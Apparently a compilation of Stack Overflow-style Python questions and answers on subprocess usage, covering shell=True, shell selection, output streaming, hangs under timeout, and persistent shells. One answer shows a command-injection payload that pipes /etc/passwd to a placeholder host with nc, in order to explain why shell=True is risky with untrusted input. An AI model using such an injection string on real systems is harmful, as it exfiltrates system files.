Launching a Linux command via Python subprocess doesn't work as expected - python

I'm trying to kill a specific Python process launched earlier, let's call it test.py.
The Linux command that terminates it is sudo pkill -f test.py, which works like a charm.
However, when trying to launch it via Python code:
subprocess.Popen('sudo pkill -f test.py', stdout=subprocess.PIPE)
I get a stack trace with OSError: [Errno 2] No such file or directory.
Any idea what I am doing wrong?

By default, subprocess.Popen interprets a string argument as the exact command name. So if you pass it the string foo bar, it will attempt to locate an executable named foo bar and invoke it without arguments; unlike an interactive shell, it will not execute the command foo with the single argument bar.
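To make that concrete, here is a minimal sketch of the difference (the commented-out call is the failing one from the question):
import subprocess

# The whole string is taken as a single program name, so Python looks for
# an executable literally called "sudo pkill -f test.py" and raises
# OSError: [Errno 2] No such file or directory:
# subprocess.Popen('sudo pkill -f test.py', stdout=subprocess.PIPE)

# Passed as a list, "sudo" is the program and the rest are its arguments:
subprocess.Popen(['sudo', 'pkill', '-f', 'test.py'], stdout=subprocess.PIPE)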
When you type foo "bar baz" or foo | bar into a shell, it is the shell that splits the command line into words and interprets those words as command name, arguments, pipe delimiters, redirection operators, and so on. The simplest way to get this kind of interpretation with subprocess.Popen is to pass shell=True, which requests that the argument be run through a shell:
subprocess.Popen('sudo pkill -f test.py', shell=True, stdout=subprocess.PIPE)
Unfortunately, as noted in the documentation, this convenient shortcut has security implications. Using shell=True is safe as long as the command to run is fixed (setting aside the obvious implications of allowing apparently password-less sudo). The problem arises when the arguments are assembled from pieces that come from other sources. For example:
# XXX security risk
subprocess.Popen('sudo pkill -f %s' % socket.read(), shell=True,
                 stdout=subprocess.PIPE)
Here we are reading the argument from a network connection, and splicing it into a string passed to the shell. Aside from the obvious problem of a maliciously crafted peer being able to kill an arbitrary process on the system (as root, no less), it is actually worse than that. Since the shell is a general tool, an attacker can use command substitution and similar features to make the system do anything it wants. For example, if the socket sends the string $(cat /etc/passwd | nc SOMEHOST; echo process-name), the Popen above will use the shell to execute:
sudo pkill -f $(cat /etc/passwd | nc SOMEHOST; echo process-name)
This is why it is generally advised not to use shell=True on untrusted input. A safer alternative is to avoid running the shell:
# smaller risk
cmd = ['sudo', 'pkill', '-f', socket.read()]
subprocess.Popen(cmd, stdout=subprocess.PIPE)
In this case, even if a malicious peer slips something weird into the string, it will not be a problem because it will be literally sent to the command to execute. In the above example, the pkill command would get a request to kill a process named $(cat ...), but there would be no shell to interpret this request to execute the command inside the parentheses.
Even without a shell, invocation of external commands with untrusted input can still be unsafe in case the command executed (in this case sudo or pkill) is itself vulnerable to injection attacks.
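If a shell genuinely is needed (for pipes or redirection, say), one common mitigation, sketched below, is to quote each untrusted piece with shlex.quote before splicing it into the command string:
import shlex
import subprocess

# Hypothetical attacker-controlled input, echoing the example above.
untrusted = '$(cat /etc/passwd | nc SOMEHOST; echo process-name)'

# shlex.quote wraps the text so the shell treats it as one literal word;
# the command substitution inside it is never executed.
cmd = 'sudo pkill -f %s' % shlex.quote(untrusted)
subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)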

Related

subprocess.call() executes the command in bash, but I'm using zsh?

I'm using Ubuntu 20 with zsh. When I use subprocess.call, it always uses bash to execute the command rather than zsh. How do I fix this?
No, it uses sh regardless of what your login shell is.
There is a keyword argument to select a different shell, but you should generally run as little code as possible in a subshell; mixing nontrivial shell script with Python means the maintainer has to understand both languages.
whatever = subprocess.run(
    'echo $SHELL',
    shell=True, executable='/usr/bin/zsh',
    check=True)
(This will echo your login shell, so the output would be /usr/bin/zsh even if you ran this without executable, or with Bash instead.)
In many situations, you should avoid shell=True entirely if you can.
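If you do drop shell=True, the command becomes an argument list and the question of which shell runs it goes away entirely; a small sketch:
import subprocess

# No shell is involved: the program and its arguments are passed directly,
# so your login shell (zsh, bash, ...) is irrelevant.
result = subprocess.run(['ls', '-l', '/tmp'], check=True,
                        capture_output=True, text=True)
print(result.stdout)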

Run shell commands with subprocess while displaying full messages

I want to run multiple Terminal commands from Python using subprocess, and not only execute the commands but also print the output that appears in the Terminal in full to my stdout, so I can see it in real time (as I would if I ran the commands directly in the Terminal).
Now, using the advice here I was able to run multiple Bash commands from Python:
def subprocess_cmd(command):
    process = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
    proc_stdout = process.communicate()[0].strip()
    print(proc_stdout)

subprocess_cmd('echo a; echo b; cd /home/; ls')
Output:
b'a\nb\n<Files_in_my_home_folder>'
So far so good. But if I try to run ls -w (which should raise an error),
subprocess_cmd('echo a; echo b; cd /home/; ls -w')
Output:
b'a\nb'
whereas the error message should be shown as it would in Terminal:
ls: option requires an argument -- 'w'
Try 'ls --help' for more information.
I would like to print out whatever is in Terminal (simultaneously with running the command) for whatever the command is, be it running some executable, or a shell command like ls.
I am using Python 3.7+, so any solution using subprocess.run or similar is also welcome. However, I'm not sure it handles multiple commands together, nor does using capture_output=True, text=True print error messages.
The stdout=subprocess.PIPE (or the shorthand capture_output=True which subsumes this and a few related settings) says that you want Python to read the output. If you simply want the subprocess to spill whatever it prints directly to standard output and/or standard error, you can simply leave out this keyword argument.
As always, don't use Popen if you can avoid it (and usually avoid shell=True if you can, though that is not possible in your example).
subprocess.check_call('echo a; echo b; cd /home/; ls', shell=True)
To briefly reiterate, this bypasses Python entirely, and lets the subprocess write to its (and Python's) standard output and/or standard error without Python's involvement or knowledge. If you need for Python to know what's printed, you'll need to have your script capture it, and have Python print it if required.
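If you do want both behaviours at once, real-time display plus a copy in Python, a minimal sketch (using the commands from the question) is to read the pipe line by line and echo each line yourself:
import subprocess

# Merge stderr into stdout so error messages (e.g. from "ls -w") appear
# in order, then echo each line as it arrives while keeping a copy.
proc = subprocess.Popen('echo a; echo b; cd /home/; ls -w',
                        shell=True, stdout=subprocess.PIPE,
                        stderr=subprocess.STDOUT, text=True)
captured = []
for line in proc.stdout:
    print(line, end='')     # show it in real time
    captured.append(line)   # keep it for later use in Python
proc.wait()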

subprocess.communicate() mysteriously hangs only when run from a script

I am invoking a Python tool called spark-ec2 from a Bash script.
As part of its work, spark-ec2 makes several calls to the system's ssh command via use of the subprocess module.
Here's an example:
s = subprocess.Popen(
    ssh_command(opts) + ['-t', '-t', '-o', 'ConnectTimeout=3',
                         '%s@%s' % (opts.user, host),
                         stringify_command('true')],
    stdout=subprocess.PIPE,
    stderr=subprocess.STDOUT  # we pipe stderr through stdout to preserve output order
)
cmd_output = s.communicate()[0]  # [1] is stderr, which we redirected to stdout
For some reason, spark-ec2 is hanging on that line where communicate() is called. I have no idea why.
For the record, here is an excerpt that shows how I'm invoking spark-ec2:
# excerpt from script-that-calls-spark-ec2.sh
# snipped: load AWS keys and do other setup stuff
timeout 30m spark-ec2 launch "$CLUSTER_NAME" ...
# snipped: if timeout, report and exit
What's killing me is that when I call spark-ec2 alone it works fine, and when I copy and paste commands from this Bash script and run them interactively they work fine.
It's only when I execute the whole script like this
$ ./script-that-calls-spark-ec2.sh
that spark-ec2 hangs on that communicate() step. This is driving me nuts.
What's going on?
This is one of those things that, once I figured it out, made me say "Wow..." out loud in a mixture of amazement and disgust.
In this case, spark-ec2 isn't hanging because of some deadlock related to the use of subprocess.PIPE, as might've been the case if spark-ec2 had used Popen.wait() instead of Popen.communicate().
The problem, as hinted to by the fact that spark-ec2 only hangs when the whole Bash script is invoked at once, is caused by something that behaves in subtly different ways depending on whether it's being called interactively or not.
In this case the culprit is the GNU coreutils utility timeout, and an option it offers called --foreground.
From the timeout man page:
--foreground
    when not running timeout directly from a shell prompt, allow COMMAND
    to read from the TTY and get TTY signals; in this mode, children of
    COMMAND will not be timed out
Without this option, Python's communicate() cannot read the output of the SSH command being invoked by subprocess.Popen().
This probably has something to do with SSH allocating TTYs via the -t switches, but honestly I don't fully understand it.
What I can say, though, is that modifying the Bash script to use the --foreground option like this
timeout --foreground 30m spark-ec2 launch "$CLUSTER_NAME" ...
makes everything work as expected.
Now, if I were you, I would consider converting that Bash script into something else that won't drive you nuts...
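For what it's worth, if that wrapper did move into Python, the same 30-minute limit could be enforced by subprocess itself rather than by coreutils timeout; a sketch with placeholder arguments, since the real spark-ec2 flags are omitted above:
import subprocess

try:
    # Placeholder command line; substitute the actual cluster name and flags.
    subprocess.run(['spark-ec2', 'launch', 'my-cluster'],
                   check=True, timeout=30 * 60)
except subprocess.TimeoutExpired:
    print('spark-ec2 launch timed out after 30 minutes')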

How to run port lookup command in python subprocess

I am using the terminal command
while ! echo exit | nc 10.0.2.11 9445; do sleep 10; done
on my command line to check a port on my remote machine (it works fine). I want to do this operation inside my Python script. I found subprocess, and I want to know how I can do this with it.
from subprocess import call
call(["while xxxxxxxxxxxxxxxxxxxxxxxxxxx"])
subprocess.call does not by default use a shell to run its commands. Therefore, things like while are unknown commands. Instead, you could pass shell=True to call (security risk with dynamic data and user input*) or call the shell directly (the same advice applies):
from subprocess import call
call("while ! echo exit | nc 10.0.2.11 9445; do sleep 10; done", shell="True")
Or you can call the shell directly. This is (a) less portable (because it assumes a specific shell) and (b) more secure (because you specify exactly which shell is used: syntax is not unified across shells, e.g. csh vs. bash, and running the same command under another shell may lead to undefined or unwanted behaviour):
from subprocess import call
call(["bash", "-c", "while ! echo exit | nc 10.0.2.11 9445; do sleep 10; done"])
The exact argument to the shell to execute a command (here -c) depends on your shell.
You may want to have a look at the subprocess docs, especially for other ways of invoking processes. See e.g. check_call as a way of checking the return code for success, check_output to get the standard output of the process and Popen for advanced input/output interaction with the process.
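For example, the retry loop itself can live in Python, with only the nc probe going through subprocess; a sketch (depending on your netcat build, you may need the original "echo exit | nc host port" form instead of -z):
import subprocess
import time

# Keep polling until nc reports that 10.0.2.11:9445 accepts connections.
while subprocess.call(['nc', '-z', '10.0.2.11', '9445']) != 0:
    time.sleep(10)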
Alternatively, you could use os.system, which implicitly launches a shell and returns the return code (subprocess.check_call with shell=True is a more flexible alternative to this).
* This link is to the Python 2 docs instead of the Python 3 docs used otherwise because it better outlines the security problems

Persistent Terminal Session in Python

I may not at all understand this correctly, but I am trying to allow a Python program to interface with a subprocess that runs commands as if on a Linux shell.
For example, I want to be able to run "cd /" and then "pwd" later in the program and get "/".
I am currently trying to use subprocess.Popen and the communicate() method to send and receive data. The first command, sent with the Popen constructor, runs fine and gives proper output. But I cannot send another command via communicate(input="pwd").
My code so far:
from subprocess import Popen, PIPE
term=Popen("pwd", stdout=PIPE, stdin=PIPE)
print(flush(term.communicate()))
term.communicate(input="cd /")
print(flush(term.communicate(input="pwd")))
Is there a better way to do this? Thanks.
Also, I am running Python 3.
First of all, you need to understand that running a shell command and running a program aren't the same thing.
Let me give you an example:
>>> import subprocess
>>> subprocess.call(['/bin/echo', '$HOME'])
$HOME
0
>>> subprocess.call(['/bin/echo $HOME'], shell=True)
/home/kkinder
0
Notice that without the shell=True parameter, the text of $HOME is not expanded. That's because the /bin/echo program doesn't parse $HOME, Bash does. What's really happening in the second call is something analogous to this:
>>> subprocess.call(['/bin/bash', '-c', '/bin/echo $HOME'])
/home/kkinder
0
Using the shell=True parameter basically says to the subprocess module, go interpret this text using a shell.
So, you could add shell=True, but then the problem is that once the command finishes, its state is lost. Each application in the stack has its own working directory, so the working directories would look something like this:
bash - /foo/bar
python - /foo
bash via subprocess - /
After your command executes, the Python process's working directory stays the same, and the subprocess's working directory is discarded once the shell finishes your command.
Basically, what you're asking for isn't practical. What you would need to do is, open a pipe to Bash, interactively feed it commands your user types, then read the output in a non-blocking way. That's going to involve a complicated pipe, threads, etc. Are you sure there's not a better way?
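That said, if the commands are known up front, a simpler compromise, sketched below, is to send them all to one shell invocation so state such as the working directory is shared:
import subprocess

# One bash process runs the whole script, so the "cd /" affects the "pwd".
script = 'cd /\npwd\n'
result = subprocess.run(['bash'], input=script,
                        stdout=subprocess.PIPE, universal_newlines=True)
print(result.stdout, end='')   # prints "/"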
